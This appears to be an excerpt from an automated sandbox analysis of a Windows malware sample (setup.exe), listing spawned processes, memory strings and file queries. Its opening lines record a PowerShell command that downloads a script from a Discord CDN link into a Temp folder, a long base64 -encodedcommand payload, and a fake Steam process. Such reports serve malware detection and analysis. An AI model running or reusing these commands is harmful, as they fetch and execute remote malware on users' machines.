                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'"
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
                        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiaagbpacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmazwbhahaaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmaegbragqaiwa+acaalqbgag8acgbjaguaiaa8acmaaablahaaiwa+adsajab3agmaiaa9acaakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackaowakagwabgbracaapqagacqadwbjac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavagwazqbtadyamqaxadeamqaxadeamqaxadeamqavahiayqb3accakqauafmacabsagkadaaoafsacwb0ahiaaqbuagcawwbdaf0aigbgahiayabuacialaagafsauwb0ahiaaqbuagcauwbwagwaaqb0ae8acab0agkabwbuahmaxqa6adoatgbvag4azqapadsaiaakagyabgagad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabsageabgbkag8abqbgagkabablae4ayqbtaguakaapadsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiaakahcaywauaeqabwb3ag4ababvageazabgagkabablacgajabsag4aawbbacqaaqbdacwaiaa8acmabgbtahkaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwbjahaazwajad4aiaatafaayqb0aggaiaakaguabgb2adoaqqbwahaarabhahqayqagadwaiwbqagkazwajad4aiaataemaaabpagwazabqageadaboacaakaakagyabgagacsaiaakagkalgbuag8auwb0ahiaaqbuagcakaapacaakwagaccalgblahgazqanackakqapacaafqa8acmaygb3agyaiwa+adsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmabgb6ahoaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbbahaacabeageadabhacaapaajaheadqbhacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapacaafqagadwaiwbpagqaegajad4a"
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "c:\users\user\appdata\local\programs\steam\steam.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\steam" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaeaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "c:\users\user\appdata\local\programs\steam\steam.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-webrequest -uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -outfile 'c:\users\user\appdata\local\temp\chrome2\index.js'"
                        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiaagbpacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmazwbhahaaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmaegbragqaiwa+acaalqbgag8acgbjaguaiaa8acmaaablahaaiwa+adsajab3agmaiaa9acaakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackaowakagwabgbracaapqagacqadwbjac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavagwazqbtadyamqaxadeamqaxadeamqaxadeamqavahiayqb3accakqauafmacabsagkadaaoafsacwb0ahiaaqbuagcawwbdaf0aigbgahiayabuacialaagafsauwb0ahiaaqbuagcauwbwagwaaqb0ae8acab0agkabwbuahmaxqa6adoatgbvag4azqapadsaiaakagyabgagad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabsageabgbkag8abqbgagkabablae4ayqbtaguakaapadsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiaakahcaywauaeqabwb3ag4ababvageazabgagkabablacgajabsag4aawbbacqaaqbdacwaiaa8acmabgbtahkaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwbjahaazwajad4aiaatafaayqb0aggaiaakaguabgb2adoaqqbwahaarabhahqayqagadwaiwbqagkazwajad4aiaataemaaabpagwazabqageadaboacaakaakagyabgagacsaiaakagkalgbuag8auwb0ahiaaqbuagcakaapacaakwagaccalgblahgazqanackakqapacaafqa8acmaygb3agyaiwa+adsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmabgb6ahoaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbbahaacabeageadabhacaapaajaheadqbhacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapacaafqagadwaiwbpagqaegajad4a"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-webrequest -uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -outfile 'c:\users\user\appdata\local\temp\chrome2\index.js'"
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "c:\users\user\appdata\local\programs\steam\steam.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\steam" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaeaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "c:\users\user\appdata\local\programs\steam\steam.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.0000000005420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..\..\third_party\webrtc\modules\desktop_capture\win\window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman..\..\third_party\webrtc\modules\desktop_capture\cropping_window_capturer.ccWindow no longer on top when ScreenCapturer finishesScreenCapturer failed to capture a frameWindow rect is emptyWindow is outside of the captured displaySysShadowWebRTC.DesktopCapture.Win.WindowGdiCapturerFrameTimeWindowCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\window_capturer_win_gdi.ccWindow hasn't been selected: Target window has been closed.Failed to get drawable window area: Failed to get window DC: Failed to create frame.Both PrintWindow() and BitBlt() failed.Capturing owned window failed (previous error/warning pertained to that)WebRTC.DesktopCapture.BlankFrameDetectedWebRTC.DesktopCapture.PrimaryCapturerSelectSourceErrorWebRTC.DesktopCapture.PrimaryCapturerErrorWebRTC.DesktopCapture.PrimaryCapturerPermanentErrordwmapi.dllDwmEnableCompositionScreenCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\screen_capturer_win_gdi.ccFailed to capture screen by GDI.WebRTC.DesktopCapture.Win.ScreenGdiCapturerFrameTimedesktop_dc_memory_dc_Failed to get screen rect.Failed to create frame buffer.Failed to select current bitmap into memery dc.BitBlt failed..\..\third_party\webrtc\modules\desktop_capture\win\cursor.ccCreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = `
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00825845 cpuid 9_2_00825845
                        Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\Desktop\setup.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
